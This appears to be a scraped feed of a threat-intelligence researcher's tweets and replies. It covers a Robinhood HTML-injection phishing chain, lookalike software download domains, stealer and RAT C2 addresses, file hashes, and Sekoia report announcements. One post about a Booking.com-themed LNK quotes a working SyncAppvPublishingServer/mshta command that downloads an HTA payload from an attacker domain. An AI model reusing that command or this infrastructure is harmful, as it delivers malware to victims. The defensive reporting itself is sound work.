Marc

@davidgobaud @rockkdev @RobinhoodApp @twilio @vladtenev Could you share the full HTML ? Could be interesting to investigate the URL they try to make you click

@rockkdev @RobinhoodApp @twilio @vladtenev @rockkdev you are right I see! The entire section below the first Device is HTML injection. Not exactly sure what they did but something like what you say.

New Robinhood phishing chain that's kinda beautiful: 1. Attacker creates an RH account using the Gmail dot trick of your email (same inbox, different address) 2. Sets device name to HTML 3. RH's "unrecognized activity" email renders the device name unsanitized (html injection) The result is a real email from noreply@robinhood.com, DKIM pass, SPF pass, DMARC pass, with a phishing CTA Just because it's real, doesn't mean it's safe... $HOOD

@g0njxa did you have a look to powershell (big) script ? Is there a name for this PS malware ?

Please note related fake results to this campaign impersonating KeePassXC , Joplin, Cyberduck, WinSCP, Amazon S3 browser, Emeditor and Putty🚨 Domains (5.8.18.129): winscp-download[.]us[.]org winscp-setup[.]net winscp-app[.]org mullvad-vpn[.]us[.]org mullvad-download[.]org mullvad-download[.]it[.]com winscp-downloads[.]com s3-browser[.]quest s3-browser-download[.]blog em-editor[.]co[.]com joplin-download[.]com joplin-desktop[.]app emeditor-download[.]co[.]com cyberduck[.]info cyber-duck[.]co[.]com filezilla-project[.]us[.]com putty-setup[.]us[.]com cyberduck-ftp[.]com cyberduck-download[.]org winscp-ftps[.]com Also observed using another EV cert from malicious signers "Shenzhen Xingzhongxing Electronic Technology Co., Ltd." (Sectigo) KeePass (keepassxc[.]us[.]org) fa68320fd6c7ea9849145066b7b13507cf4186900a218cdc67d387341632d825 b4ad76f7fab47d36f538df5f8f7b5d5f41f15a6c2c3a9c128dd1d49b3d96957c

@solostalking @500mk500 At the end of the page we can see "© 2025 Phantom Security • HackTheBox", could be linked to hackthebox.com

WTH is this Phantom RaaS C2 !!!! 83[.136.251.11:34671 94[.237.63.174:36050 94[.237.49.88:36050 Is this someone's project? currently 30 hosts are active, all under UPCLOUD (202053) @500mk500 any idea!

@abuse_ch @Bitsight First samples pdb and User Agent use "SystemInfo"

Potential new stealer dropped by #Amadey, caught by @Bitsight 🤖🔍Who can name it? ⤵️ 👉 #sandnet" target="_blank" rel="nofollow noopener">hunting.abuse.ch/hunt/6919ec1c9… Botnet C2 domains: 📡defender-temeerty .sbs 📡telemetry-defender .lol Botnet C2 server: 🛑185.100.157.69:443 (Partner Hosting 🇬🇧) Malware sample: 📄 bazaar.abuse.ch/sample/903cdf6… Dropped by Amadey via: 🌐 urlhaus.abuse.ch/host/arabianai…

🇨🇳 We're excited to announce the publication of the latest Sekoia #TDR team report, « A Three Beats Waltz: The ecosystem behind Chinese state-sponsored cyber threats." blog.sekoia.io/a-three-beats-…

🔍 TDR investigated the emerging #ClickFix social engineering tactic, which several intrusion sets adopted in 2024 to distribute their malware. Our research provides a chronological overview of the observed ClickFix campaigns and their victimology. blog.sekoia.io/clickfix-tacti…

🚨 Discover #Mamba2FA, a previously unknown adversary-in-the-middle (AiTM) #phishing kit, sold as phishing-as-a-service (PhaaS) ⚠️ blog.sekoia.io/mamba-2fa-a-ne…

Since mid-2023, the Sekoia #TDR team has investigated an infrastructure which controls compromised edge devices transformed into Operational Relay Boxes (#ORBs) used to support operations of multiple 🇨🇳 intrusion sets. Check out the full report ⤵️ blog.sekoia.io/bulbature-bene…

Happy to announce my new project! 🚀 Do you use Google Meet? Meet TigerTakes on tigertakes.com – your new meeting assistant! 🎯 Connect our bot directly to your Google Meet sessions and get clear, concise summaries in no time. Sign up for free now!

🚨 Sekoia TDR uncovered key insights into the infrastructure behind #Emmenthal Loader distribution using #WebDAV as a service! Thanks to @CERTCyberdef & @Mandiant for their research, which helped shed light on this! 🙏 Read the full report here: blog.sekoia.io/webdav-as-a-se…

Have you ever heard about “#DoppelGänger”? 👀 In our new report, the Sekoia #TDR team analysed the #DoppelGänger campaign's relays, technical infrastructure, and shared narratives. blog.sekoia.io/master-of-pupp… #Influence #InformationWarfare #CTI

@r3dbU7z Yeah was aware of that but was wondering how threat actor delivers this payload

@CTI_Marc #шоданинтеллигенс😉 Hello, this is s3cr3t information🤫 Ref[1]:twitter.com/r3dbU7z/status…

System Script Proxy Execution: SyncAppvPublishingServer [ITW] url: .193.124.33.71/ Downloads/ Scan_rekvizity_03.05.2024\.pdf\.lnk [WebDav] e57b2d8b31362ff888fc2f1e58365170 contract_calc\.xls\.lnk b827da23c3485e7f95049596c2e4fab4 Ref[1]:attack.mitre.org/techniques/T12…

👀 Discover our new report, which provides an in-depth analysis of cyber threats to elections based on past targeted elections. It identifies various types of cyber operations and proposes an assessment of threats regarding the major elections in 2024. blog.sekoia.io/guarding-democ…

🔍Discover how to proactively detect malicious activities with Censys data in our next webinar with  @sekoia_io. Explore challenges in monitoring decentralized infrastructures and see MalleableC2 in action📈Book your spot now: go.censys.com/April-Lunch-an…

@bigfootcorporal Hello, where did you find this website ?

@1ZRR4H @ShanHolo @malwrhunterteam @JAMESWT_MHT @StopMalvertisin @pr0xylife @0xToxin @executemalware @ankit_anubhav @AnFam17 Do you know what is the infection vector ? Phishing email with webdav link ?

I think this should be part of another campaign (focused on stealing Booking accounts initially), the one I posted is related to a known threat actor, which distributes Malware (via LNK, HTA, ZIP files, etc) using WebDAV servers mainly on LIMENET. Anyway, I guess Booking users have been targeted since the beginning of the brand.

Booking[.]com_Confirmation.lnk f20cf00e1b53bb5ba941721c6a0aa77ff12eb64808e7fdfca5263878d6abdcd9 ↓ C:\Windows\System32\SyncAppvPublishingServer.vbs ;.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://galaxe-team[.]info/Downloads/Hotel/Booking.hta "Confirmation.exe" is reported as #AsyncRAT (version: "Venom RAT + HVNC + Stealer + Grabber v6.0.2") C2: 178.33.57.153:4449 [+] Sample: bazaar.abuse.ch/sample/b9371b2…. * Interesting that "Confirmation.exe" is a 7zip SFX (self-extracting) archive that uses AutoIt to achieve the infection 🔎 + WebDAV \\91.92.251.163@80\Downloads\

Very glad to share a part of our 2023 work, don't hesitate if you have any question

🧵 @sekoia_io tracks C2 infrastructures for main #stealer families sold as a Malware-as-a-Service (MaaS). Our view of active C2s, combined with our observations from telemetry, forum monitoring and sample tracking, gives us a global understanding of the stealer threat. ⬇️

@0xM4R10 @virustotal After some analysis the website is used to deliver StealC malware ! Our report on StealC malware: blog.sekoia.io/stealc-a-copyc… ( cc @ValeryMarchive )

@0xM4R10 Hello, approach is very close to what we published in end 2023: blog.sekoia.io/game-over-gami… Do you still have .exe file ? Can you upload it to @virustotal ?

🚨 SCAM ALERT 🚨 Today I was targeted by the most sophisticated scam I have experienced so far. Luckily, they didn't manage to steal a single cent from me, but I could have lost everything I had and it could easily happen to you. Thread 🧵👇